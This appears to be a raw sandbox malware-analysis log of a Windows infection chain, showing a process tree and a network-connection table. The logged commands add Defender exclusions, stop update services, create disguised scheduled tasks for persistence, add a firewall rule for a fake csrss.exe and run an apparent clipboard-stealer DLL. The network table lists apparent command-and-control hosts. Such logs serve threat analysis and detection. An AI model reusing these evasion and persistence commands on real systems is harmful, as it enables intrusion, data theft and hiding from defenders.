C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1280 -ip 1280

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4160 -ip 4160

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3hW12Bd.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3hW12Bd.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4116 -ip 4116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 572

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4yR691vd.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4yR691vd.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3312 -ip 3312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3312 -s 572

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5BZ2yc0.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5BZ2yc0.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C3EC.tmp\C3ED.tmp\C3EE.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5BZ2yc0.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffb7ad446f8,0x7ffb7ad44708,0x7ffb7ad44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffb7ad446f8,0x7ffb7ad44708,0x7ffb7ad44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,18039423732050909519,3254974625713545776,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,18039423732050909519,3254974625713545776,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,12331750757530156001,3423851050206400187,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,12331750757530156001,3423851050206400187,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,12331750757530156001,3423851050206400187,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,12331750757530156001,3423851050206400187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,12331750757530156001,3423851050206400187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,12331750757530156001,3423851050206400187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,12331750757530156001,3423851050206400187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,12331750757530156001,3423851050206400187,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,12331750757530156001,3423851050206400187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,12331750757530156001,3423851050206400187,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6224 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,12331750757530156001,3423851050206400187,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6224 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,12331750757530156001,3423851050206400187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,12331750757530156001,3423851050206400187,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\16B0.exe

C:\Users\Admin\AppData\Local\Temp\16B0.exe

C:\Users\Admin\AppData\Local\Temp\1C9C.exe

C:\Users\Admin\AppData\Local\Temp\1C9C.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sh6hE7ZX.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sh6hE7ZX.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hq4pv4zr.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hq4pv4zr.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1oS28ea9.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1oS28ea9.exe

C:\Users\Admin\AppData\Local\Temp\20A4.bat

"C:\Users\Admin\AppData\Local\Temp\20A4.bat"

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ly3QD9BA.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Ly3QD9BA.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4132 -ip 4132

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\23B3.exe

C:\Users\Admin\AppData\Local\Temp\23B3.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3184 -ip 3184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1640 -ip 1640

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\21FA.tmp\21FB.tmp\21FC.bat C:\Users\Admin\AppData\Local\Temp\20A4.bat"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1888 -ip 1888

C:\Users\Admin\AppData\Local\Temp\2AC8.exe

C:\Users\Admin\AppData\Local\Temp\2AC8.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1888 -s 388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1640 -s 540

C:\Users\Admin\AppData\Local\Temp\3335.exe

C:\Users\Admin\AppData\Local\Temp\3335.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb7ad446f8,0x7ffb7ad44708,0x7ffb7ad44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb7ad446f8,0x7ffb7ad44708,0x7ffb7ad44718

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,12331750757530156001,3423851050206400187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2yI890Ix.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2yI890Ix.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,12331750757530156001,3423851050206400187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,12331750757530156001,3423851050206400187,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:1

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\6DDE.exe

C:\Users\Admin\AppData\Local\Temp\6DDE.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\84E2.exe

C:\Users\Admin\AppData\Local\Temp\84E2.exe

C:\Users\Admin\AppData\Local\Temp\8744.exe

C:\Users\Admin\AppData\Local\Temp\8744.exe

C:\Users\Admin\AppData\Local\Temp\8ADF.exe

C:\Users\Admin\AppData\Local\Temp\8ADF.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5896 -ip 5896

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 792

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 195.233.44.23.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 157.240.247.35:443 www.facebook.com tcp
NL 157.240.247.35:443 www.facebook.com tcp
US 8.8.8.8:53 35.247.240.157.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 27.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 35.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 83.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
RU 5.42.92.211:80 5.42.92.211 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 211.92.42.5.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
US 8.8.8.8:53 222.70.216.185.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 pastebin.com udp
FI 77.91.124.55:19071 tcp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
NL 85.209.176.171:80 85.209.176.171 tcp
US 8.8.8.8:53 171.176.209.85.in-addr.arpa udp
US 8.8.8.8:53 tak.soydet.top udp
FI 95.217.246.182:8443 tak.soydet.top tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 182.246.217.95.in-addr.arpa udp
US 8.8.8.8:53 bytecloudasa.website udp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 39.212.67.172.in-addr.arpa udp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 31.12.26.104.in-addr.arpa udp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
